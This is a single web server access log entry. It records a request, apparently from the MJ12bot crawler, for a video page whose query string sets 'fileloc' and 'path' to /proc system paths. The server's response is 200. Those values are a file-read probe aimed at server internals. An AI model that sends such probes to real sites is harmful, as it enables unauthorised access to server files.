79.137.67.30 - - [09/Nov/2025:00:04:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/mountinfo&path=//proc/20 HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
